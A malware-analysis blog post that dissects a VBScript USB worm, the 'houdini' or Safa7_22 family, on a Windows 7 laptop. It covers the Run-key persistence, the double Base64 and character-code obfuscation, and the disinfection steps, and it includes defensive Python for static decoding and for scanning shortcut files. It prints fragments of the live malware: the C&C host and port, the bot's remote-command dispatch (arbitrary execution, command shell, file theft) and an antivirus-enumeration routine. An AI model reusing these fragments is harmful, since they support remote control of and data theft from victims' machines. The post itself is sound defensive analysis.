Last week I was asked to check a Windows 7 x64 laptop because of extremely poor performance, so as a first step I ran a complete scan with Malwarebytes Anti-Malware Free and Avira Antivirus. These two great free tools did a great job, cleaning more than 170 infected objects!! After the reboot I started another scan just to be sure everything was fine, and the results confirmed the clean status.
Two days ago the same laptop started creating strange links on every USB stick plugged in, so I started a manual analysis of the behaviour (unfortunately my Cuckoo Sandbox is still being built and is not ready yet): using a clean, freshly formatted pen drive I copied a test folder onto the USB stick, and after a few seconds that folder was hidden and replaced by a link with the same folder name pointing at the following command:
C:\Windows\system32\cmd.exe /c start mmpifmxnth..vbs&start explorer <folder_name>&exit
OK… I had a clue to start the investigation, so I searched for mmpifmxnth..vbs using Windows Search (it's not a forensic tool but it's quick enough for a first search 🙂 ) without any result. I found the right path by looking at the Run registry key:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run = wscript.exe //B "C:\Users\<username>\AppData\Roaming\mmpifmxnth..vbs"
The file was hidden and flagged as a system file, so I needed to enable "Show hidden files" and "Show system files" (i.e. untick "Hide protected operating system files") in the Windows Explorer folder options in order to see it.
Finally I moved the VBS script to my Linux box: Avira Antivirus had not detected the malicious content, not even when the file was opened in Notepad!!!
When I opened it in gedit I found a big block of obfuscated code like this:
'< -Safa7_22 Crypter- >
Safa7_22 = deCrypt("UkZwRFRFOVdSVklnUFNBaU16bDhaSHA4TmpCOFpIcDhPVEY4WkhwOE16Sjh HA4TVRBd2ZHUjZmREV3TFZrVlNLRWtwS1EwS1RrVJhUTB4UFZrVlNLRWtwS1EHA4TmpCOFpIcDhPVEY NBaU16bDhaSHA4TmpCOFpIcDhPVEY4WkhwOE16SjrVJhUTB4UFZrVlN4TmpCOFpIcD4UFZrVRFRFUF7 ---CUT--- JhUTB4UFZrVlNLRWtwS1EwS1RrVllWQTBLUlZoRlExVlVSU0FvWkhvcA==")
Safa7_22 = deCrypt(Safa7_22)
The comment on the first line refers to the "Safa7_22 Crypter" encoder, but the text is simply Base64 encoded twice: I used base64decoder.org to do a two-step decoding (with the UTF-8 charset) and get the next layer of the script. The double encoding is easy to spot from the trailing "==" padding of the encoded text and from the functions deCrypt(data) / decodeDz(data), with deCrypt being called twice on the same data before the EXECUTE:
---CUT--- JhUTB4UFZrVlNLRWtwS1EwS1RrVllWQTBLUlZoRlExVlVSU0FvWkhvcA==")
Safa7_22 = deCrypt(Safa7_22)
EXECUTE (Safa7_22)
function deCrypt(data)
deCrypt=decodeDz(data)
end function
The script seems slightly different from the original one you can find with a Google search, and its MD5 hash has a lower detection score on VirusTotal. Anyway, the double decoding gave me a more readable script, but it is still encoded!!! This time the payload is a list of decimal character codes separated by "|dz|":
---CUT--- |dz|110|dz|99|dz|116|dz|105|dz|111|dz|110|dz|"
DZCLOVER = SPLIT(DZCLOVER,"|dz|")
FOR I = 0 TO UBOUND(DZCLOVER) -1
dz = dz & CHR(DZCLOVER(I))
NEXT
EXECUTE (dz)
The last line decodes the payload and executes it on the target machine, so I patched the script, removing the EXECUTE and adding a write-to-file step that saves the plain-text decoded script:
DZCLOVER = SPLIT(DZCLOVER,"|dz|")
FOR I = 0 TO UBOUND(DZCLOVER) -1
dz = dz & CHR(DZCLOVER(I))
NEXT
Set fso = CreateObject("Scripting.FileSystemObject")
Set stdout = fso.CreateTextFile("C:\TEMP\malware.txt")
stdout.WriteLine dz
stdout.Close
Finally I ran the patched version inside a Windows 7 x64 virtual machine and got the original malware in C:\TEMP\malware.txt (the locally installed antivirus detected the text file as malicious, so I had to stop it before executing the script), using the following command (note the double slash: //B is the wscript host option for batch mode, the same one the malware uses in its Run key):
wscript.exe //B mmpifmxnth_patched.vbs
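The whole decoding chain above (two rounds of Base64 around the deCrypt stub, then the "|dz|" character-code list) can also be unwrapped statically, without ever letting an EXECUTE run, which is safer than patching the script and launching it under wscript in a VM. The Python below is an added example written for this post, not part of the original analysis and not the malware's own code: build_sample() fabricates a constructed stand-in with the same three layers around a hypothetical two-line plaintext, and the regexes assume only the literal shapes shown above (a deCrypt("…") Base64 literal and a quoted "|dz|" list).

```python
import base64
import re

DZ_SEP = "|dz|"

# The two literal shapes seen in the sample:
#   Safa7_22 = deCrypt("UkZwRFRF...==")     -> Base64, applied twice
#   DZCLOVER = "|dz|110|dz|99|dz|...|dz|"   -> decimal character codes
B64_LITERAL = re.compile(r'deCrypt\(\s*"([A-Za-z0-9+/=\s]+)"\s*\)')
DZ_LITERAL = re.compile(r'"((?:\|dz\||\d)+)"')


def looks_base64(s: str) -> bool:
    s = re.sub(r"\s+", "", s)
    return len(s) % 4 == 0 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s) is not None


def b64_to_text(s: str) -> str:
    return base64.b64decode(re.sub(r"\s+", "", s)).decode("utf-8")


def dz_decode(blob: str) -> str:
    """Reverse the SPLIT/CHR loop: every numeric field is one character.
    The loop in the sample runs 0..UBOUND-1, which drops the empty trailing
    field left by the final '|dz|'; filtering on isdigit() does the same."""
    return "".join(chr(int(p)) for p in blob.split(DZ_SEP) if p.strip().isdigit())


def peel(script: str, max_layers: int = 8):
    """Statically unwrap the layers, never EXECUTE-ing anything.
    Returns (innermost text, names of the layers in the order removed)."""
    layers, cur = [], script
    for _ in range(max_layers):
        m = B64_LITERAL.search(cur)
        if m:
            data = m.group(1)
            try:
                while looks_base64(data):   # deCrypt is called twice in the sample
                    data = b64_to_text(data)
                    layers.append("base64")
            except (ValueError, UnicodeDecodeError):
                break                       # not text: stop rather than guess
            cur = data
            continue
        m = DZ_LITERAL.search(cur)
        if m and DZ_SEP in m.group(1):
            cur = dz_decode(m.group(1))
            layers.append("dz-charcodes")
            continue
        break
    return cur, layers


def dz_encode(text: str) -> str:
    return DZ_SEP + DZ_SEP.join(str(ord(c)) for c in text) + DZ_SEP


def build_sample(plain: str) -> str:
    """Constructed stand-in for mmpifmxnth..vbs with the same three layers as
    the article's sample: char codes -> Base64 -> Base64 around a deCrypt stub."""
    stage3 = ('DZCLOVER = "%s"\r\nDZCLOVER = SPLIT(DZCLOVER,"|dz|")\r\n'
              'FOR I = 0 TO UBOUND(DZCLOVER) -1\r\ndz = dz & CHR(DZCLOVER(I))\r\nNEXT\r\n'
              'EXECUTE (dz)\r\n') % dz_encode(plain)
    b64 = lambda s: base64.b64encode(s.encode("utf-8")).decode("ascii")
    return ("'< -Safa7_22 Crypter- >\r\nSafa7_22 = deCrypt(\"%s\")\r\n"
            "Safa7_22 = deCrypt(Safa7_22)\r\nEXECUTE (Safa7_22)\r\n") % b64(b64(stage3))


if __name__ == "__main__":
    # hypothetical plaintext; the real payload is the houdini script shown later
    sample = build_sample('host = "dev-point1.no-ip.info"\r\nport = 2121\r\n')
    text, layers = peel(sample)
    print(layers)
    print(text)
```

Running it on a real sample is just peel(open(path, encoding="utf-8", errors="replace").read()); the returned layer list tells you which stages were present, which is handy when a variant adds or drops one.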
The code analysis was really interesting and I found many features provided by the malware… the first line is a comment with the author's Skype ID!!!
Under the config section there are the callback domain, the C&C port and the installation folder. The domain is hosted on one of the most famous free dynamic DNS services (No-IP) and at the time of writing resolved to 37.200.254.47 (Muscat, Oman, Omani Qatari Telecommunications Company SAOC).
'<[ recoder : houdini (c) skype : houdini-fx ]>
'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
host = "dev-point1.no-ip.info"
port = 2121
installdir = "%appdata%"
lnkfile = true
lnkfolder = true
---CUT---
At startup the malware checks whether the host is already infected and, if not, installs itself; it then sends an HTTP POST with the command "is-ready" to notify the C&C and waits for the response, which carries the command to execute. The list of available commands is the following (note the "excecute" typo, which is in the malware itself):
case "excecute"
param = cmd (1)
execute param
case "update"
param = cmd (1)
oneonce.close
set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)
oneonce.write param
oneonce.close
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
wscript.quit
case "uninstall"
uninstall
case "send"
download cmd (1),cmd (2)
case "site-send"
sitedownloader cmd (1),cmd (2)
case "recv"
param = cmd (1)
upload (param)
case "enum-driver"
post "is-enum-driver",enumdriver
case "enum-faf"
param = cmd (1)
post "is-enum-faf",enumfaf (param)
case "enum-process"
post "is-enum-process",enumprocess
case "cmd-shell"
param = cmd (1)
post "is-cmd-shell",cmdshell (param)
case "delete"
param = cmd (1)
deletefaf (param)
case "exit-process"
param = cmd (1)
exitprocess (param)
case "sleep"
param = cmd (1)
sleep = eval (param)
end select
Looking deeper into the source code, I worked out what every command does:
- execute ("excecute" in the code): run arbitrary VBScript code sent by the C&C on the victim host
- update : overwrite the installed script with the code received from the C&C and relaunch it. For example it could be used to change the callback domain 🙂
- uninstall : remove the malware from the system and clean every malicious .lnk file
- send : copy a file from the attacker to the victim
- site-send : copy a file hosted on a website to the victim
- recv : upload a file from the victim host to the attacker
- enum-driver : list the victim host's drives
- enum-faf : list the files and folders under the path given as parameter
- enum-process : list the victim's running processes
- cmd-shell : run a command through a command shell and post the output back to the C&C
- delete : delete a file or folder on the victim host
- exit-process : kill a specific process on the victim host
- sleep : set the polling interval between requests to the C&C (the default, sleep = 5000 i.e. 5 seconds, is in the private vars section)
This malware provides the attacker with a lot of information about the victim host: operating system, architecture, service pack level, logical drives, running processes, etc…
There is also a specific function (security) used to enumerate the Security Center and the antivirus status via WMI:
function security
on error resume next
security = ""
set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for x = 1 to ubound (versionstr)
osversion = osversion & versionstr (i)
next
osversion = eval (osversion)
' Vista and later expose the AV list under root\SecurityCenter2, XP under root\SecurityCenter
if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
for each objantivirus in colantivirus
security = security & objantivirus.displayname & " ."
next
if security = "" then security = "nan-av"
end function
(The version loop is reproduced as found in the sample: it counts with x but indexes with i, and only "on error resume next" keeps it from failing.)
Using this function the attacker can enumerate the security products installed on the victim host and then act as a dropper: with the send command the attacker can push a second-stage payload crafted to evade that specific antivirus and start the evasion from there.
A more detailed analysis of the malware's GET and POST commands is available at http://research.zscaler.com/2014/01/analysis-of-vbscript-bot.html (thanks to Stefano @SerKill1984 for the link).
VirusTotal shows a 26/47 detection rate for this malware and you can read the complete report here. The names given to the malware by the most famous antivirus products are:
- AVG: Exploit_c.YUV
- AVAST: VBS:Decode-BL [Trj]
- NOD32: VBS/Kryptik.J
- Kaspersky: Worm.VBS.Dinihou.c
- McAfee: VBS/Autorun.worm.aapf
- Microsoft: Worm:VBS/Jenxcus.K
- Sophos: VBS/Safa-A
- Symantec: VBS.Dunihi
- TrendMicro: VBS_DUNIHI.FF
How to remove the mmpifmxnth malware?
- Open the Task Manager and check whether wscript.exe is running. If it is, terminate the process.
- Change your Windows Explorer settings to show hidden and system files.
- Run regedit and go to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run.
- Look for the mmpifmxnth value and copy the installation path into a text editor (Notepad). Then delete the registry value.
- In regedit go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run and delete the mmpifmxnth value.
- Open Windows Explorer and browse to the installation path you copied in step 4.
- Delete mmpifmxnth..vbs (yes… there are two dots!).
- Delete every link that launches the .vbs script (the cmd.exe /c start … links shown above) on every USB stick and unhide the original folders, or just format the pen drives 🙂
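The shortcuts the worm drops (the cmd.exe /c start <script>.vbs&start explorer <folder>&exit target described at the start of the post) and the last removal step above can both be handled with a small triage script: parse every .lnk on the stick, pull out its command-line arguments and flag the ones that match that launcher pattern, noting whether the hidden folder it impersonates is still beside it. The Python below is an added example, not code from the original post or from the malware: parse_lnk() is a minimal reader for the MS-SHLLINK format (header check, optional LinkTargetIDList and LinkInfo skipped, StringData fields read), build_lnk() fabricates a constructed shortcut for testing, and the "Photos" folder name and the cp1252 fallback code page for non-Unicode shortcuts are assumptions.

```python
import os
import re
import struct

# MS-SHLLINK constants: the ShellLinkHeader is 76 bytes, LinkFlags sits at offset 20.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = b"\x01\x14\x02\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x46"
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                 (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location"))

# Launcher pattern from the article: cmd.exe /c start <script>.vbs&start explorer <folder>&exit
WORM_ARGS = re.compile(
    r"/c\s+start\s+(?P<vbs>[^&\s]+\.vbs)\s*&\s*start\s+explorer\s+(?P<folder>.+?)\s*&\s*exit",
    re.IGNORECASE)


def parse_lnk(data: bytes) -> dict:
    """Minimal shell-link reader: validate the header, skip the optional
    LinkTargetIDList and LinkInfo blocks, then read the StringData fields
    (the command-line arguments live there). Trailing extra data blocks are ignored."""
    hdr_size, flags = struct.unpack_from("<I16xI", data, 0)
    if hdr_size != LNK_HEADER_SIZE or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    off = LNK_HEADER_SIZE
    if flags & HAS_ID_LIST:                       # IDListSize (uint16) + IDList bytes
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                     # LinkInfoSize (uint32) counts itself
        off += struct.unpack_from("<I", data, off)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for bit, name in STRING_FIELDS:
        if flags & bit:
            count = struct.unpack_from("<H", data, off)[0]   # CountCharacters, no terminator
            off += 2
            nbytes = count * 2 if unicode else count
            # non-Unicode strings use the system code page; cp1252 is an assumption here
            fields[name] = data[off:off + nbytes].decode("utf-16-le" if unicode else "cp1252")
            off += nbytes
    return fields


def classify_lnk(fields: dict):
    """{'vbs': ..., 'folder': ...} when the arguments match the worm's launcher, else None."""
    m = WORM_ARGS.search(fields.get("arguments", ""))
    return {"vbs": m.group("vbs"), "folder": m.group("folder")} if m else None


def scan_tree(root: str) -> list:
    """Walk a mounted USB stick (or any tree) and report worm-style .lnk files,
    recording whether the folder each one impersonates still sits beside it."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for fn in filenames:
            if not fn.lower().endswith(".lnk"):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "rb") as fh:
                    hit = classify_lnk(parse_lnk(fh.read()))
            except (ValueError, struct.error, UnicodeDecodeError):
                continue                          # damaged or unrelated shortcut
            if hit:
                hit["lnk"] = path
                hit["hidden_folder_present"] = hit["folder"] in dirnames
                hits.append(hit)
    return hits


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Constructed .lnk for testing: Unicode strings, an empty IDList, no LinkInfo."""
    flags = HAS_ID_LIST | HAS_REL_PATH | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sI", LNK_HEADER_SIZE, LNK_CLSID, flags) + b"\x00" * 52
    id_list = struct.pack("<H", 2) + b"\x00\x00"  # IDListSize 2: only the TerminalID

    def s(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + id_list + s(relative_path) + s(arguments)


if __name__ == "__main__":
    sample = build_lnk("..\\..\\..\\Windows\\system32\\cmd.exe",
                       "/c start mmpifmxnth..vbs&start explorer Photos&exit")
    print(classify_lnk(parse_lnk(sample)))
```

On a real stick, scan_tree("E:\\") returns one entry per malicious shortcut with the script name it launches; delete those .lnk files, clear the hidden attribute on the folders they impersonate, and hand the extracted .vbs name to the registry clean-up steps above.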
I hope the article will be useful. If you have any questions or suggestions use the comment form below !
I actually tried to decipher this virus myself after seeing what the links execute.
I got as far as the DZCLOVER stuff before I tried searching Google for “DZCLOVER” and found this site.
Awesome work! 🙂
You might wanna use the uninstall command to remove the malware from the system. 😉
hhhhhh nice job, now you can't decipher any file, I use a new method to crypt my virus
and no one can delete or kill it